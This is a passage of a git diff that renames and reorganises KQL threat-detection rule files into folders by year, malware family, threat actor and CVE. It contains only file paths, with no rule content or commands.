b/KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/potential_coldsteel_persistence_service_dll_creation.kql similarity index 100% rename from KQL/rules-emerging-threats/Persistence/potential_coldsteel_persistence_service_dll_creation.kql rename to KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/potential_coldsteel_persistence_service_dll_creation.kql diff --git a/KQL/rules-emerging-threats/Persistence/potential_coldsteel_persistence_service_dll_load.kql b/KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/potential_coldsteel_persistence_service_dll_load.kql similarity index 100% rename from KQL/rules-emerging-threats/Persistence/potential_coldsteel_persistence_service_dll_load.kql rename to KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/potential_coldsteel_persistence_service_dll_load.kql diff --git a/KQL/rules-emerging-threats/Persistence/potential_coldsteel_rat_file_indicators.kql b/KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/potential_coldsteel_rat_file_indicators.kql similarity index 100% rename from KQL/rules-emerging-threats/Persistence/potential_coldsteel_rat_file_indicators.kql rename to KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/potential_coldsteel_rat_file_indicators.kql diff --git a/KQL/rules-emerging-threats/Persistence/potential_coldsteel_rat_windows_user_creation.kql b/KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/potential_coldsteel_rat_windows_user_creation.kql similarity index 100% rename from KQL/rules-emerging-threats/Persistence/potential_coldsteel_rat_windows_user_creation.kql rename to KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/potential_coldsteel_rat_windows_user_creation.kql diff --git a/KQL/rules-emerging-threats/Execution/darkgate_autoit3_exe_execution_parameters.kql b/KQL/rules-emerging-threats/2023/Malware/DarkGate/darkgate_autoit3_exe_execution_parameters.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/darkgate_autoit3_exe_execution_parameters.kql rename to KQL/rules-emerging-threats/2023/Malware/DarkGate/darkgate_autoit3_exe_execution_parameters.kql diff --git a/KQL/rules-emerging-threats/Command and Control/darkgate_autoit3_exe_file_creation_by_uncommon_process.kql b/KQL/rules-emerging-threats/2023/Malware/DarkGate/darkgate_autoit3_exe_file_creation_by_uncommon_process.kql similarity index 100% rename from KQL/rules-emerging-threats/Command and Control/darkgate_autoit3_exe_file_creation_by_uncommon_process.kql rename to KQL/rules-emerging-threats/2023/Malware/DarkGate/darkgate_autoit3_exe_file_creation_by_uncommon_process.kql diff --git a/KQL/rules-emerging-threats/Persistence/darkgate_user_created_via_net_exe.kql b/KQL/rules-emerging-threats/2023/Malware/DarkGate/darkgate_user_created_via_net_exe.kql similarity index 100% rename from KQL/rules-emerging-threats/Persistence/darkgate_user_created_via_net_exe.kql rename to KQL/rules-emerging-threats/2023/Malware/DarkGate/darkgate_user_created_via_net_exe.kql diff --git a/KQL/rules-emerging-threats/Execution/griffon_malware_attack_pattern.kql b/KQL/rules-emerging-threats/2023/Malware/Griffon/griffon_malware_attack_pattern.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/griffon_malware_attack_pattern.kql rename to KQL/rules-emerging-threats/2023/Malware/Griffon/griffon_malware_attack_pattern.kql diff --git a/KQL/rules-emerging-threats/Privilege Escalation/injected_browser_process_spawning_rundll32_guloader_activity.kql b/KQL/rules-emerging-threats/2023/Malware/GuLoader/injected_browser_process_spawning_rundll32_guloader_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Privilege Escalation/injected_browser_process_spawning_rundll32_guloader_activity.kql rename to KQL/rules-emerging-threats/2023/Malware/GuLoader/injected_browser_process_spawning_rundll32_guloader_activity.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/icedid_malware_suspicious_single_digit_dll_execution_via_rundll32.kql b/KQL/rules-emerging-threats/2023/Malware/IcedID/icedid_malware_suspicious_single_digit_dll_execution_via_rundll32.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/icedid_malware_suspicious_single_digit_dll_execution_via_rundll32.kql rename to KQL/rules-emerging-threats/2023/Malware/IcedID/icedid_malware_suspicious_single_digit_dll_execution_via_rundll32.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/pikabot_fake_dll_extension_execution_via_rundll32_exe.kql b/KQL/rules-emerging-threats/2023/Malware/Pikabot/pikabot_fake_dll_extension_execution_via_rundll32_exe.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/pikabot_fake_dll_extension_execution_via_rundll32_exe.kql rename to KQL/rules-emerging-threats/2023/Malware/Pikabot/pikabot_fake_dll_extension_execution_via_rundll32_exe.kql diff --git a/KQL/rules-emerging-threats/Command and Control/potential_pikabot_c2_activity.kql b/KQL/rules-emerging-threats/2023/Malware/Pikabot/potential_pikabot_c2_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Command and Control/potential_pikabot_c2_activity.kql rename to KQL/rules-emerging-threats/2023/Malware/Pikabot/potential_pikabot_c2_activity.kql diff --git a/KQL/rules-emerging-threats/Discovery/potential_pikabot_discovery_activity.kql b/KQL/rules-emerging-threats/2023/Malware/Pikabot/potential_pikabot_discovery_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Discovery/potential_pikabot_discovery_activity.kql rename to KQL/rules-emerging-threats/2023/Malware/Pikabot/potential_pikabot_discovery_activity.kql diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_pikabot_hollowing_activity.kql b/KQL/rules-emerging-threats/2023/Malware/Pikabot/potential_pikabot_hollowing_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Privilege Escalation/potential_pikabot_hollowing_activity.kql rename to KQL/rules-emerging-threats/2023/Malware/Pikabot/potential_pikabot_hollowing_activity.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_pikabot_infection_suspicious_command_combinations_via_cmd_exe.kql b/KQL/rules-emerging-threats/2023/Malware/Pikabot/potential_pikabot_infection_suspicious_command_combinations_via_cmd_exe.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/potential_pikabot_infection_suspicious_command_combinations_via_cmd_exe.kql rename to KQL/rules-emerging-threats/2023/Malware/Pikabot/potential_pikabot_infection_suspicious_command_combinations_via_cmd_exe.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_qakbot_rundll32_execution.kql b/KQL/rules-emerging-threats/2023/Malware/Qakbot/potential_qakbot_rundll32_execution.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/potential_qakbot_rundll32_execution.kql rename to KQL/rules-emerging-threats/2023/Malware/Qakbot/potential_qakbot_rundll32_execution.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/qakbot_regsvr32_calc_pattern.kql b/KQL/rules-emerging-threats/2023/Malware/Qakbot/qakbot_regsvr32_calc_pattern.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/qakbot_regsvr32_calc_pattern.kql rename to KQL/rules-emerging-threats/2023/Malware/Qakbot/qakbot_regsvr32_calc_pattern.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/qakbot_rundll32_exports_execution.kql b/KQL/rules-emerging-threats/2023/Malware/Qakbot/qakbot_rundll32_exports_execution.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/qakbot_rundll32_exports_execution.kql rename to KQL/rules-emerging-threats/2023/Malware/Qakbot/qakbot_rundll32_exports_execution.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/qakbot_rundll32_fake_dll_extension_execution.kql b/KQL/rules-emerging-threats/2023/Malware/Qakbot/qakbot_rundll32_fake_dll_extension_execution.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/qakbot_rundll32_fake_dll_extension_execution.kql rename to KQL/rules-emerging-threats/2023/Malware/Qakbot/qakbot_rundll32_fake_dll_extension_execution.kql diff --git a/KQL/rules-emerging-threats/Execution/qakbot_uninstaller_execution.kql b/KQL/rules-emerging-threats/2023/Malware/Qakbot/qakbot_uninstaller_execution.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/qakbot_uninstaller_execution.kql rename to KQL/rules-emerging-threats/2023/Malware/Qakbot/qakbot_uninstaller_execution.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/rhadamanthys_stealer_module_launch_via_rundll32_exe.kql b/KQL/rules-emerging-threats/2023/Malware/Rhadamanthys/rhadamanthys_stealer_module_launch_via_rundll32_exe.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/rhadamanthys_stealer_module_launch_via_rundll32_exe.kql rename to KQL/rules-emerging-threats/2023/Malware/Rhadamanthys/rhadamanthys_stealer_module_launch_via_rundll32_exe.kql diff --git a/KQL/rules-emerging-threats/Execution/rorschach_ransomware_execution_activity.kql b/KQL/rules-emerging-threats/2023/Malware/Rorschach/rorschach_ransomware_execution_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/rorschach_ransomware_execution_activity.kql rename to KQL/rules-emerging-threats/2023/Malware/Rorschach/rorschach_ransomware_execution_activity.kql diff --git a/KQL/rules-emerging-threats/Persistence/potential_encrypted_registry_blob_related_to_snake_malware.kql b/KQL/rules-emerging-threats/2023/Malware/SNAKE/potential_encrypted_registry_blob_related_to_snake_malware.kql similarity index 100% rename from KQL/rules-emerging-threats/Persistence/potential_encrypted_registry_blob_related_to_snake_malware.kql rename to KQL/rules-emerging-threats/2023/Malware/SNAKE/potential_encrypted_registry_blob_related_to_snake_malware.kql diff --git a/KQL/rules-emerging-threats/Execution/potential_snake_malware_installation_binary_indicator.kql b/KQL/rules-emerging-threats/2023/Malware/SNAKE/potential_snake_malware_installation_binary_indicator.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/potential_snake_malware_installation_binary_indicator.kql rename to KQL/rules-emerging-threats/2023/Malware/SNAKE/potential_snake_malware_installation_binary_indicator.kql diff --git a/KQL/rules-emerging-threats/Execution/potential_snake_malware_installation_cli_arguments_indicator.kql b/KQL/rules-emerging-threats/2023/Malware/SNAKE/potential_snake_malware_installation_cli_arguments_indicator.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/potential_snake_malware_installation_cli_arguments_indicator.kql rename to KQL/rules-emerging-threats/2023/Malware/SNAKE/potential_snake_malware_installation_cli_arguments_indicator.kql diff --git a/KQL/rules-emerging-threats/Execution/potential_snake_malware_persistence_service_execution.kql b/KQL/rules-emerging-threats/2023/Malware/SNAKE/potential_snake_malware_persistence_service_execution.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/potential_snake_malware_persistence_service_execution.kql rename to KQL/rules-emerging-threats/2023/Malware/SNAKE/potential_snake_malware_persistence_service_execution.kql diff --git a/KQL/rules-emerging-threats/Persistence/snake_malware_covert_store_registry_key.kql b/KQL/rules-emerging-threats/2023/Malware/SNAKE/snake_malware_covert_store_registry_key.kql similarity index 100% rename from KQL/rules-emerging-threats/Persistence/snake_malware_covert_store_registry_key.kql rename to KQL/rules-emerging-threats/2023/Malware/SNAKE/snake_malware_covert_store_registry_key.kql diff --git a/KQL/rules-emerging-threats/Execution/snake_malware_installer_name_indicators.kql b/KQL/rules-emerging-threats/2023/Malware/SNAKE/snake_malware_installer_name_indicators.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/snake_malware_installer_name_indicators.kql rename to KQL/rules-emerging-threats/2023/Malware/SNAKE/snake_malware_installer_name_indicators.kql diff --git a/KQL/rules-emerging-threats/Execution/snake_malware_kernel_driver_file_indicator.kql b/KQL/rules-emerging-threats/2023/Malware/SNAKE/snake_malware_kernel_driver_file_indicator.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/snake_malware_kernel_driver_file_indicator.kql rename to KQL/rules-emerging-threats/2023/Malware/SNAKE/snake_malware_kernel_driver_file_indicator.kql diff --git a/KQL/rules-emerging-threats/Execution/snake_malware_werfault_persistence_file_creation.kql b/KQL/rules-emerging-threats/2023/Malware/SNAKE/snake_malware_werfault_persistence_file_creation.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/snake_malware_werfault_persistence_file_creation.kql rename to KQL/rules-emerging-threats/2023/Malware/SNAKE/snake_malware_werfault_persistence_file_creation.kql diff --git a/KQL/rules-emerging-threats/Execution/ursnif_redirection_of_discovery_commands.kql b/KQL/rules-emerging-threats/2023/Malware/Ursnif/ursnif_redirection_of_discovery_commands.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/ursnif_redirection_of_discovery_commands.kql rename to KQL/rules-emerging-threats/2023/Malware/Ursnif/ursnif_redirection_of_discovery_commands.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/malicious_dll_load_by_compromised_3cxdesktopapp.kql b/KQL/rules-emerging-threats/2023/TA/3CX-Supply-Chain/malicious_dll_load_by_compromised_3cxdesktopapp.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/malicious_dll_load_by_compromised_3cxdesktopapp.kql rename to KQL/rules-emerging-threats/2023/TA/3CX-Supply-Chain/malicious_dll_load_by_compromised_3cxdesktopapp.kql diff --git a/KQL/rules-emerging-threats/Command and Control/potential_compromised_3cxdesktopapp_beaconing_activity_netcon.kql b/KQL/rules-emerging-threats/2023/TA/3CX-Supply-Chain/potential_compromised_3cxdesktopapp_beaconing_activity_netcon.kql similarity index 100% rename from KQL/rules-emerging-threats/Command and Control/potential_compromised_3cxdesktopapp_beaconing_activity_netcon.kql rename to KQL/rules-emerging-threats/2023/TA/3CX-Supply-Chain/potential_compromised_3cxdesktopapp_beaconing_activity_netcon.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_compromised_3cxdesktopapp_execution.kql b/KQL/rules-emerging-threats/2023/TA/3CX-Supply-Chain/potential_compromised_3cxdesktopapp_execution.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/potential_compromised_3cxdesktopapp_execution.kql rename to KQL/rules-emerging-threats/2023/TA/3CX-Supply-Chain/potential_compromised_3cxdesktopapp_execution.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_compromised_3cxdesktopapp_update_activity.kql b/KQL/rules-emerging-threats/2023/TA/3CX-Supply-Chain/potential_compromised_3cxdesktopapp_update_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/potential_compromised_3cxdesktopapp_update_activity.kql rename to KQL/rules-emerging-threats/2023/TA/3CX-Supply-Chain/potential_compromised_3cxdesktopapp_update_activity.kql diff --git a/KQL/rules-emerging-threats/Command and Control/potential_suspicious_child_process_of_3cxdesktopapp.kql b/KQL/rules-emerging-threats/2023/TA/3CX-Supply-Chain/potential_suspicious_child_process_of_3cxdesktopapp.kql similarity index 100% rename from KQL/rules-emerging-threats/Command and Control/potential_suspicious_child_process_of_3cxdesktopapp.kql rename to KQL/rules-emerging-threats/2023/TA/3CX-Supply-Chain/potential_suspicious_child_process_of_3cxdesktopapp.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/dll_names_used_by_svr_for_graphicalproton_backdoor.kql b/KQL/rules-emerging-threats/2023/TA/Cozy-Bear/dll_names_used_by_svr_for_graphicalproton_backdoor.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/dll_names_used_by_svr_for_graphicalproton_backdoor.kql rename to KQL/rules-emerging-threats/2023/TA/Cozy-Bear/dll_names_used_by_svr_for_graphicalproton_backdoor.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/diamond_sleet_apt_dll_sideloading_indicators.kql b/KQL/rules-emerging-threats/2023/TA/Diamond-Sleet/diamond_sleet_apt_dll_sideloading_indicators.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/diamond_sleet_apt_dll_sideloading_indicators.kql rename to KQL/rules-emerging-threats/2023/TA/Diamond-Sleet/diamond_sleet_apt_dll_sideloading_indicators.kql diff --git a/KQL/rules-emerging-threats/Execution/diamond_sleet_apt_file_creation_indicators.kql b/KQL/rules-emerging-threats/2023/TA/Diamond-Sleet/diamond_sleet_apt_file_creation_indicators.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/diamond_sleet_apt_file_creation_indicators.kql rename to KQL/rules-emerging-threats/2023/TA/Diamond-Sleet/diamond_sleet_apt_file_creation_indicators.kql diff --git a/KQL/rules-emerging-threats/Execution/diamond_sleet_apt_process_activity_indicators.kql b/KQL/rules-emerging-threats/2023/TA/Diamond-Sleet/diamond_sleet_apt_process_activity_indicators.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/diamond_sleet_apt_process_activity_indicators.kql rename to KQL/rules-emerging-threats/2023/TA/Diamond-Sleet/diamond_sleet_apt_process_activity_indicators.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/diamond_sleet_apt_scheduled_task_creation_registry.kql b/KQL/rules-emerging-threats/2023/TA/Diamond-Sleet/diamond_sleet_apt_scheduled_task_creation_registry.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/diamond_sleet_apt_scheduled_task_creation_registry.kql rename to KQL/rules-emerging-threats/2023/TA/Diamond-Sleet/diamond_sleet_apt_scheduled_task_creation_registry.kql diff --git a/KQL/rules-emerging-threats/Execution/potential_apt_fin7_reconnaissance_powertrash_related_activity.kql b/KQL/rules-emerging-threats/2023/TA/FIN7/potential_apt_fin7_reconnaissance_powertrash_related_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/potential_apt_fin7_reconnaissance_powertrash_related_activity.kql rename to KQL/rules-emerging-threats/2023/TA/FIN7/potential_apt_fin7_reconnaissance_powertrash_related_activity.kql diff --git a/KQL/rules-emerging-threats/Execution/potential_apt_fin7_related_powershell_script_created.kql b/KQL/rules-emerging-threats/2023/TA/FIN7/potential_apt_fin7_related_powershell_script_created.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/potential_apt_fin7_related_powershell_script_created.kql rename to KQL/rules-emerging-threats/2023/TA/FIN7/potential_apt_fin7_related_powershell_script_created.kql diff --git a/KQL/rules-emerging-threats/Execution/lace_tempest_cobalt_strike_download.kql b/KQL/rules-emerging-threats/2023/TA/Lace-Tempest/lace_tempest_cobalt_strike_download.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/lace_tempest_cobalt_strike_download.kql rename to KQL/rules-emerging-threats/2023/TA/Lace-Tempest/lace_tempest_cobalt_strike_download.kql diff --git a/KQL/rules-emerging-threats/Execution/lace_tempest_file_indicators.kql b/KQL/rules-emerging-threats/2023/TA/Lace-Tempest/lace_tempest_file_indicators.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/lace_tempest_file_indicators.kql rename to KQL/rules-emerging-threats/2023/TA/Lace-Tempest/lace_tempest_file_indicators.kql diff --git a/KQL/rules-emerging-threats/Execution/lace_tempest_malware_loader_execution.kql b/KQL/rules-emerging-threats/2023/TA/Lace-Tempest/lace_tempest_malware_loader_execution.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/lace_tempest_malware_loader_execution.kql rename to KQL/rules-emerging-threats/2023/TA/Lace-Tempest/lace_tempest_malware_loader_execution.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/lazarus_apt_dll_sideloading_activity.kql b/KQL/rules-emerging-threats/2023/TA/Lazarus/lazarus_apt_dll_sideloading_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/lazarus_apt_dll_sideloading_activity.kql rename to KQL/rules-emerging-threats/2023/TA/Lazarus/lazarus_apt_dll_sideloading_activity.kql diff --git a/KQL/rules-emerging-threats/Execution/mint_sandstorm_asperafaspex_suspicious_process_execution.kql b/KQL/rules-emerging-threats/2023/TA/Mint-Sandstorm/mint_sandstorm_asperafaspex_suspicious_process_execution.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/mint_sandstorm_asperafaspex_suspicious_process_execution.kql rename to KQL/rules-emerging-threats/2023/TA/Mint-Sandstorm/mint_sandstorm_asperafaspex_suspicious_process_execution.kql diff --git a/KQL/rules-emerging-threats/Execution/mint_sandstorm_log4j_wstomcat_process_execution.kql b/KQL/rules-emerging-threats/2023/TA/Mint-Sandstorm/mint_sandstorm_log4j_wstomcat_process_execution.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/mint_sandstorm_log4j_wstomcat_process_execution.kql rename to KQL/rules-emerging-threats/2023/TA/Mint-Sandstorm/mint_sandstorm_log4j_wstomcat_process_execution.kql diff --git a/KQL/rules-emerging-threats/Execution/mint_sandstorm_manageengine_suspicious_process_execution.kql b/KQL/rules-emerging-threats/2023/TA/Mint-Sandstorm/mint_sandstorm_manageengine_suspicious_process_execution.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/mint_sandstorm_manageengine_suspicious_process_execution.kql rename to KQL/rules-emerging-threats/2023/TA/Mint-Sandstorm/mint_sandstorm_manageengine_suspicious_process_execution.kql diff --git a/KQL/rules-emerging-threats/Execution/potential_apt_mustang_panda_activity_against_australian_gov.kql b/KQL/rules-emerging-threats/2023/TA/Mustang-Panda-Australia-Campaign/potential_apt_mustang_panda_activity_against_australian_gov.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/potential_apt_mustang_panda_activity_against_australian_gov.kql rename to KQL/rules-emerging-threats/2023/TA/Mustang-Panda-Australia-Campaign/potential_apt_mustang_panda_activity_against_australian_gov.kql diff --git a/KQL/rules-emerging-threats/Execution/onyx_sleet_apt_file_creation_indicators.kql b/KQL/rules-emerging-threats/2023/TA/Onyx-Sleet/onyx_sleet_apt_file_creation_indicators.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/onyx_sleet_apt_file_creation_indicators.kql rename to KQL/rules-emerging-threats/2023/TA/Onyx-Sleet/onyx_sleet_apt_file_creation_indicators.kql diff --git a/KQL/rules-emerging-threats/Execution/papercut_mf_ng_exploitation_related_indicators.kql b/KQL/rules-emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/papercut_mf_ng_exploitation_related_indicators.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/papercut_mf_ng_exploitation_related_indicators.kql rename to KQL/rules-emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/papercut_mf_ng_exploitation_related_indicators.kql diff --git a/KQL/rules-emerging-threats/Execution/papercut_mf_ng_potential_exploitation.kql b/KQL/rules-emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/papercut_mf_ng_potential_exploitation.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/papercut_mf_ng_potential_exploitation.kql rename to KQL/rules-emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/papercut_mf_ng_potential_exploitation.kql diff --git a/KQL/rules-emerging-threats/Execution/peach_sandstorm_apt_process_activity_indicators.kql b/KQL/rules-emerging-threats/2023/TA/Peach-Sandstorm/peach_sandstorm_apt_process_activity_indicators.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/peach_sandstorm_apt_process_activity_indicators.kql rename to KQL/rules-emerging-threats/2023/TA/Peach-Sandstorm/peach_sandstorm_apt_process_activity_indicators.kql diff --git a/KQL/rules-emerging-threats/Execution/unc4841_barracuda_esg_exploitation_indicators.kql b/KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_barracuda_esg_exploitation_indicators.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/unc4841_barracuda_esg_exploitation_indicators.kql rename to KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_barracuda_esg_exploitation_indicators.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/unc4841_download_compressed_files_from_temp_sh_using_wget.kql b/KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_download_compressed_files_from_temp_sh_using_wget.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/unc4841_download_compressed_files_from_temp_sh_using_wget.kql rename to KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_download_compressed_files_from_temp_sh_using_wget.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/unc4841_download_tar_file_from_untrusted_direct_ip_via_wget.kql b/KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_download_tar_file_from_untrusted_direct_ip_via_wget.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/unc4841_download_tar_file_from_untrusted_direct_ip_via_wget.kql rename to KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_download_tar_file_from_untrusted_direct_ip_via_wget.kql diff --git a/KQL/rules-emerging-threats/Execution/unc4841_email_exfiltration_file_pattern.kql b/KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_email_exfiltration_file_pattern.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/unc4841_email_exfiltration_file_pattern.kql rename to KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_email_exfiltration_file_pattern.kql diff --git a/KQL/rules-emerging-threats/Execution/unc4841_potential_seaspy_execution.kql b/KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_potential_seaspy_execution.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/unc4841_potential_seaspy_execution.kql rename to KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_potential_seaspy_execution.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/unc4841_ssl_certificate_exfiltration_via_openssl.kql b/KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_ssl_certificate_exfiltration_via_openssl.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/unc4841_ssl_certificate_exfiltration_via_openssl.kql rename to KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_ssl_certificate_exfiltration_via_openssl.kql diff --git a/KQL/rules-emerging-threats/Persistence/cve_2024_1708_screenconnect_path_traversal_exploitation.kql b/KQL/rules-emerging-threats/2024/Exploits/CVE-2024-1708/cve_2024_1708_screenconnect_path_traversal_exploitation.kql similarity index 100% rename from KQL/rules-emerging-threats/Persistence/cve_2024_1708_screenconnect_path_traversal_exploitation.kql rename to KQL/rules-emerging-threats/2024/Exploits/CVE-2024-1708/cve_2024_1708_screenconnect_path_traversal_exploitation.kql diff --git a/KQL/rules-emerging-threats/Persistence/screenconnect_user_database_modification.kql b/KQL/rules-emerging-threats/2024/Exploits/CVE-2024-1709/screenconnect_user_database_modification.kql similarity index 100% rename from KQL/rules-emerging-threats/Persistence/screenconnect_user_database_modification.kql rename to KQL/rules-emerging-threats/2024/Exploits/CVE-2024-1709/screenconnect_user_database_modification.kql diff --git a/KQL/rules-emerging-threats/Execution/potential_exploitation_of_cve_2024_3094_suspicious_ssh_child_process.kql b/KQL/rules-emerging-threats/2024/Exploits/CVE-2024-3094/potential_exploitation_of_cve_2024_3094_suspicious_ssh_child_process.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/potential_exploitation_of_cve_2024_3094_suspicious_ssh_child_process.kql rename to KQL/rules-emerging-threats/2024/Exploits/CVE-2024-3094/potential_exploitation_of_cve_2024_3094_suspicious_ssh_child_process.kql diff --git a/KQL/rules-emerging-threats/Execution/potential_cve_2024_3400_exploitation_palo_alto_globalprotect_os_command_injection_file_creation.kql b/KQL/rules-emerging-threats/2024/Exploits/CVE-2024-3400/potential_cve_2024_3400_exploitation_palo_alto_globalprotect_os_command_injection_file_creation.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/potential_cve_2024_3400_exploitation_palo_alto_globalprotect_os_command_injection_file_creation.kql rename to KQL/rules-emerging-threats/2024/Exploits/CVE-2024-3400/potential_cve_2024_3400_exploitation_palo_alto_globalprotect_os_command_injection_file_creation.kql diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2024_35250_exploitation_activity.kql b/KQL/rules-emerging-threats/2024/Exploits/CVE-2024-35250/potential_cve_2024_35250_exploitation_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2024_35250_exploitation_activity.kql rename to KQL/rules-emerging-threats/2024/Exploits/CVE-2024-35250/potential_cve_2024_35250_exploitation_activity.kql diff --git a/KQL/rules-emerging-threats/Execution/potential_exploitation_of_cve_2024_37085_suspicious_creation_of_esx_admins_group.kql b/KQL/rules-emerging-threats/2024/Exploits/CVE-2024-37085/potential_exploitation_of_cve_2024_37085_suspicious_creation_of_esx_admins_group.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/potential_exploitation_of_cve_2024_37085_suspicious_creation_of_esx_admins_group.kql rename to KQL/rules-emerging-threats/2024/Exploits/CVE-2024-37085/potential_exploitation_of_cve_2024_37085_suspicious_creation_of_esx_admins_group.kql diff --git a/KQL/rules-emerging-threats/Initial Access/cve_2024_50623_exploitation_attempt_cleo.kql b/KQL/rules-emerging-threats/2024/Exploits/CVE-2024-50623/cve_2024_50623_exploitation_attempt_cleo.kql similarity index 100% rename from KQL/rules-emerging-threats/Initial Access/cve_2024_50623_exploitation_attempt_cleo.kql rename to KQL/rules-emerging-threats/2024/Exploits/CVE-2024-50623/cve_2024_50623_exploitation_attempt_cleo.kql diff --git a/KQL/rules-emerging-threats/Command and Control/potential_csharp_streamer_rat_loading_net_executable_image.kql b/KQL/rules-emerging-threats/2024/Malware/CSharp-Streamer/potential_csharp_streamer_rat_loading_net_executable_image.kql similarity index 100% rename from KQL/rules-emerging-threats/Command and Control/potential_csharp_streamer_rat_loading_net_executable_image.kql rename to KQL/rules-emerging-threats/2024/Malware/CSharp-Streamer/potential_csharp_streamer_rat_loading_net_executable_image.kql diff --git a/KQL/rules-emerging-threats/Execution/darkgate_drop_darkgate_loader_in_c_temp_directory.kql b/KQL/rules-emerging-threats/2024/Malware/DarkGate/darkgate_drop_darkgate_loader_in_c_temp_directory.kql 